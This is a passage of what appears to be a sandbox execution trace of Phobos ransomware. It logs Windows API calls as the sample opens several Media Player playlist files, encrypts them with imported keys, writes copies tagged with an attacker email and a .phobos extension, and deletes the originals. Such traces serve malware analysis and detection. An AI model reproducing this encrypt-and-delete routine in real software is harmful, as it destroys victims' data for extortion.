lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x320, lpOverlapped=0x0) returned 1 [0186.916] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa327e8) returned 1 [0186.916] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0186.916] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70, dwBufLen=0x70 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70) returned 1 [0186.916] CryptDestroyKey (hKey=0xa327e8) returned 1 [0186.916] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x122, lpOverlapped=0x0) returned 1 [0186.916] CryptDestroyKey (hKey=0xa32a28) returned 1 [0186.916] CloseHandle (hObject=0x134) returned 1 [0186.916] CloseHandle (hObject=0x194) returned 1 [0186.916] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\06_Pictures_rated_4_or_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\06_pictures_rated_4_or_5_stars.wpl")) returned 1 [0186.917] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0186.917] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\08_Video_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\08_video_rated_at_4_or_5_stars.wpl"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0186.918] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1020) returned 1 [0186.918] CloseHandle (hObject=0x194) returned 1 [0186.918] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\08_Video_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\08_video_rated_at_4_or_5_stars.wpl")) returned 0x2020 [0186.919] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\08_Video_rated_at_4_or_5_stars.wpl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\08_video_rated_at_4_or_5_stars.wpl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0186.919] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\08_Video_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\08_video_rated_at_4_or_5_stars.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0186.919] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0186.919] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0186.919] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\08_Video_rated_at_4_or_5_stars.wpl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\08_video_rated_at_4_or_5_stars.wpl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0186.920] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32a28) returned 1 [0186.920] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0186.920] ReadFile (in: hFile=0x194, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x3fc, lpOverlapped=0x0) returned 1 [0186.940] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x400, dwBufLen=0x400 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x400) returned 1 [0186.940] WriteFile (in: hFile=0x134, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x400, lpOverlapped=0x0) returned 1 [0186.941] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa327e8) returned 1 [0186.941] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0186.941] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70, dwBufLen=0x70 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70) returned 1 [0186.941] CryptDestroyKey (hKey=0xa327e8) returned 1 [0186.941] WriteFile (in: hFile=0x134, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x122, lpOverlapped=0x0) returned 1 [0186.941] CryptDestroyKey (hKey=0xa32a28) returned 1 [0186.941] CloseHandle (hObject=0x194) returned 1 [0186.941] CloseHandle (hObject=0x134) returned 1 [0186.941] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\08_Video_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\08_video_rated_at_4_or_5_stars.wpl")) returned 1 [0186.942] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0186.942] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\09_Music_played_the_most.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\09_music_played_the_most.wpl"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0186.943] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1025) returned 1 [0186.943] CloseHandle (hObject=0x134) returned 1 [0186.943] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\09_Music_played_the_most.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\09_music_played_the_most.wpl")) returned 0x2020 [0186.943] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\09_Music_played_the_most.wpl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\09_music_played_the_most.wpl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0186.943] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\09_Music_played_the_most.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\09_music_played_the_most.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0186.944] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0186.944] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0186.944] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\09_Music_played_the_most.wpl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\09_music_played_the_most.wpl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0186.945] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32a28) returned 1 [0186.945] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0186.945] ReadFile (in: hFile=0x134, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x401, lpOverlapped=0x0) returned 1 [0186.955] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x410, dwBufLen=0x410 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x410) returned 1 [0186.955] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x410, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x410, lpOverlapped=0x0) returned 1 [0186.956] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa327e8) returned 1 [0186.956] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0186.956] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60, dwBufLen=0x60 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60) returned 1 [0186.956] CryptDestroyKey (hKey=0xa327e8) returned 1 [0186.956] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x112, lpOverlapped=0x0) returned 1 [0186.956] CryptDestroyKey (hKey=0xa32a28) returned 1 [0186.956] CloseHandle (hObject=0x134) returned 1 [0186.956] CloseHandle (hObject=0x194) returned 1 [0186.956] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\09_Music_played_the_most.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\09_music_played_the_most.wpl")) returned 1 [0186.957] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0186.957] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\10_All_Music.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\10_all_music.wpl"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0186.958] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1063) returned 1 [0186.958] CloseHandle (hObject=0x194) returned 1 [0186.958] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\10_All_Music.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\10_all_music.wpl")) returned 0x2020 [0186.958] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\10_All_Music.wpl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\10_all_music.wpl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0186.958] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\10_All_Music.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\10_all_music.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0186.959] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0186.959] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0186.959] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\10_All_Music.wpl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\10_all_music.wpl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0186.959] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32a28) returned 1 [0186.960] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0186.960] ReadFile (in: hFile=0x194, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x427, lpOverlapped=0x0) returned 1 [0186.973] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x430, dwBufLen=0x430 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x430) returned 1 [0186.973] WriteFile (in: hFile=0x134, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x430, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x430, lpOverlapped=0x0) returned 1 [0186.974] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32a68) returned 1 [0186.974] CryptSetKeyParam (hKey=0xa32a68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0186.974] CryptEncrypt (in: hKey=0xa32a68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0186.974] CryptDestroyKey (hKey=0xa32a68) returned 1 [0186.974] WriteFile (in: hFile=0x134, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0186.974] CryptDestroyKey (hKey=0xa32a28) returned 1 [0186.974] CloseHandle (hObject=0x194) returned 1 [0186.974] CloseHandle (hObject=0x134) returned 1 [0186.974] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\10_All_Music.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\10_all_music.wpl")) returned 1 [0186.975] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0186.975] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\11_All_Pictures.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\11_all_pictures.wpl"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0186.987] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=585) returned 1 [0186.987] CloseHandle (hObject=0x134) returned 1 [0186.987] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\11_All_Pictures.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\11_all_pictures.wpl")) returned 0x2020 [0186.987] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\11_All_Pictures.wpl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\11_all_pictures.wpl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0186.987] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\11_All_Pictures.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\11_all_pictures.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0186.988] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0186.988] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0186.988] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\11_All_Pictures.wpl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\11_all_pictures.wpl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0186.988] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32a28) returned 1 [0186.988] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0186.988] ReadFile (in: hFile=0x134, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x249, lpOverlapped=0x0) returned 1 [0186.989] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x250, dwBufLen=0x250 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x250) returned 1 [0186.989] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x250, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x250, lpOverlapped=0x0) returned 1 [0186.990] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32a68) returned 1 [0186.990] CryptSetKeyParam (hKey=0xa32a68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0186.990] CryptEncrypt (in: hKey=0xa32a68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0186.990] CryptDestroyKey (hKey=0xa32a68) returned 1 [0186.990] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0186.990] CryptDestroyKey (hKey=0xa32a28) returned 1 [0186.990] CloseHandle (hObject=0x134) returned 1 [0186.990] CloseHandle (hObject=0x194) returned 1 [0186.990] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\11_All_Pictures.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\11_all_pictures.wpl")) returned 1 [0186.991] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0186.991] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\12_All_Video.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\12_all_video.wpl"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0186.993] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1079) returned 1 [0186.993] CloseHandle (hObject=0x194) returned 1 [0186.993] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\12_All_Video.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\12_all_video.wpl")) returned 0x2020 [0186.993] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\12_All_Video.wpl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\12_all_video.wpl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0186.993] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\12_All_Video.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\12_all_video.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0186.993] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0186.993] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0186.993] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync 